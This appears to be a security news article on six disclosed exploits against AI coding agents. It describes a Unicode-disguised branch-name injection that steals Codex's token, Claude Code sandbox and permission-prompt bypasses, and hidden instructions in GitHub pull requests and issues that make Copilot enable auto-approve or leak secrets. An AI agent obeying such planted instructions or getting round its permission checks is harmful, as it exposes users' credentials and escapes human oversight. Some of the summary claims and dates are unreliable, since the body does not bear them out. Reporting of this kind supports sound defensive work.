Six Exploits Broke AI Coding Agents in Nine Months. Every Attack Targeted Credentials.

Over nine months, six independent research teams demonstrated the same brutal truth about AI coding assistants: they're credential sponges wrapped in a polished interface. On March 30, BeyondTrust proved that a crafted GitHub branch name could steal Codex's OAuth token in cleartext—OpenAI classified it Critical P1 and shipped a fix by February 5, 2026. Two days later, Adversa found Claude Code silently ignored its own deny rules once a command exceeded 50 subcommands. These weren't isolated bugs. They were the latest entries in a systematic exploitation of an attack surface that every major AI vendor has failed to secure.

The Codex Branch Name Heist

BeyondTrust researchers Tyler Jespersen, Fletcher Davis, and Simon Stewart found that Codex cloned repositories using a GitHub OAuth token embedded directly in the git remote URL. During cloning, the branch name parameter flowed unsanitized into the setup script—meaning a semicolon and backtick turned it into an exfiltration payload. But Stewart added the stealth layer: by appending 94 Ideographic Space characters (Unicode U+3000) after "main," the malicious branch looked identical to the standard main branch in Codex's web portal. A developer sees "main." The shell sees curl exfiltrating their token. OpenAI remediated this by February 5, 2026.

Claude Code's Triple Threat

Anthropic's agent faced three distinct bypasses. CVE-2026-25723 hit file-write restrictions when piped sed and echo commands escaped the project sandbox because command chaining wasn't validated—patched in version 2.0.55. CVE-2026-33068 was subtler: Claude Code resolved permission modes from .claude/settings.json before showing the workspace trust dialog, so a malicious repo could set permissions.defaultMode to bypassPermissions and never trigger the prompt—patched in 2.1.53. The third exploit landed last, where Adversa discovered that Claude Code dropped deny-rule enforcement entirely once commands exceeded 50 subcommands—Anthropic's engineers had traded security for speed and stopped checking after fifty.

Copilot's Pull Request Trap

Johann Rehberger and Markus Vervier of Persistent Security demonstrated CVE-2025-53773 against GitHub Copilot, where hidden instructions in pull request descriptions triggered the agent to flip auto-approve mode in .vscode/settings.json—disabling all confirmations and granting unrestricted shell execution across Windows, macOS, and Linux. Microsoft patched it in August 2025 Patch Tuesday. Then Orca Security cracked Copilot inside GitHub Codespaces using a GitHub issue containing hidden instructions that manipulated the agent into checking out a malicious PR with a symbolic link to /workspaces/.codespaces/shared/user-secrets-envs.json—full repository takeover, zero user interaction beyond opening the issue.

Vertex AI's Supply Chain Exposure

Unit 42 researcher Ofir Shaty found that Google Vertex AI's default service identity had excessive permissions by design. The stolen P4SA credentials granted unrestricted read access to every Cloud Storage bucket in the project and reached restricted, Google-owned Artifact Registry repositories at the core of Vertex AI Reasoning Engine. Shaty described the compromised P4SA as functioning like a "double agent" with access to both user data and Google's own infrastructure.

The Credential Gap Nobody's Fixing

"Enterprises believe they've 'approved' AI vendors, but what they've actually approved is an interface, not the underlying system," said Merritt Baer, CSO at Enkrypt AI and former Deputy CISO at AWS. "The credentials underneath the interface are the breach." Mike Riemer, CTO at Ivanti, quantified the operational risk: "Threat actors are reverse engineering patches within 72 hours. If a customer doesn't patch within 72 hours of release, they're open to exploit." For AI agents, that window compresses to seconds.

Key Takeaways

Every major AI coding assistant—Codex, Claude Code, Copilot, Vertex AI—was exploited via credential theft or privilege escalation in the same nine-month period
The attack pattern is identical: agents hold credentials, execute actions, authenticate without human session anchoring
Vendors shipped defenses for each exploit, but every defense was subsequently bypassed by researchers
CrowdStrike CTO Elia Zaitsev's rule at RSAC 2026: collapse agent identities back to the human—agents should never have more privileges than their users
Enterprises inventory every human identity but have zero inventory of AI agents running with equivalent credentials

> Six Exploits Broke AI Coding Agents in Nine Months. Every Attack Targeted Credentials.